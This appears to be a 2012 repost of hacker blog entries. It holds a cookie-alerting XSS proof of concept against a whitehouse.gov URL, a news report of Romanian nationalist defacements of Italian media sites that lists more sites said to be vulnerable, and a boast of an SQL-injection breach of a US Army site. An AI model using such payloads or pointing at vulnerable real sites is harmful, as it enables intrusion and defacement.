Wednesday, February 1, 2012

TinKode-WhiteHouse.gov XSS Vulnerability


WhiteHouse.gov XSS Vulnerability

Posted by isrtinkode on April 25, 2010
POC:
https://app2.whitehouse.gov/*******?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>
Screen:

Note: You can’t do much with that, but it’s a vulnerability anyway! :)

TinKode-Romanian National Security


RNS – Romanian National Security – Italy

Posted by isrtinkode on May 1, 2010
The group of Romanian hacktivists calling themselves Romanian National Security (RNS) have attacked and defaced multiple websites belonging to the biggest Italian public television company Radiotelevisione Italiana (RAI), as well as leading Italian newspapers La Stampa and Corriere della Sera. The message left behind on the hacked Web properties condemns the association of the Romanian people with the Romani ethnic group, commonly referred to as gypsies.
RNS is a group of Romanian nationalist hackers who appear to have taken issue with how some international publications depict Romania and its people. Their initial hit was carried out earlier this month against renowned British newspaper The Daily Telegraph and resulted in the defacement of two websites hosted under the telegraph.co.uk domain.
Screenshot of citymusiclab.city.corriere.it/eventi/ defaced
A week later, the group retaliated in a similar fashion against reputable French newspaper Le Monde for a joke made by humorist Jonathan Lambert during a TV show on national television. The staged performance, which had Lambert present the so-called “new Romanian salute” by imitating a beggar with his hand raised, was strongly criticized in Romania for being offensive and racist.
Romanian security blog HackersBlog reports that www.citizenreport.rai.it, a community website owned and operated by the Italian public service broadcaster RAI, was hacked by members of the RNS via SQL injection. The hackers left behind a message, expressing anger at the local media.
The attacks on Italian publications continued with complete defacements of tuttoaffari.lastampa.it and citymusiclab.city.corriere.it/eventi/, two websites belonging to La Stampa and Corriere della Sera, respectively. At the time of writing this article, the index pages of both sites display a shield logo in the colors of the Romanian flag and the same threatening message used in the Radiotelevisione Italiana hack.
Screenshot of tuttoaffari.lastampa.it defaced
“It’s time to close our fingers into a fist and unforgivingly strike as many times as need be, for you to reap the harvest of your lies. We promise you will not forget about Romania and her past again. We, descendants of Trajan and Decebalus, are not a nation of gypsies! We have run out of patience and, in the name of Romanians everywhere, we warn that if you don’t stop presenting our entire people as Romani or gypsies, even more tricolor flags [reference to Romania's red, yellow and blue flag] will be raised; until all untruths are exposed and apologies are issued,” the message signed by RNS reads.
A Romanian saying, roughly translating into “Eagles may occasionally fly lower than chickens, but chickens will never soar in the sky,” is displayed at the bottom, while Ciprian Porumbescu’s Ballad for Violin and Orchestra plays in the background.
Mirrors of the defaced websites are available via MirrorTurk for the RAI and Corriere della Sera attacks and Zone-H for the La Stampa one. According to HackersBlog, RNS members also found vulnerabilities on lordine.it, storialibera.it, giornaledicalabria.it, unita.it, pontediferro.org and momentosera.it, but these websites have not yet been defaced.
Source: http://news.softpedia.com/news/Romanian-Nationalists-Hit-Several-Italian-Media-Outlets-141062.shtml
Antena 1:

TinKode-www.stanley.army.mil Hacked


www.stanley.army.mil Hacked

Posted by isrtinkode on May 2, 2010
URL: http://www.stanley.army.mil
Information: FTP Access
Method: SQL Injection
Screenshot: http://img697.imageshack.us/img697/9268/wwwstanleyarmymil.png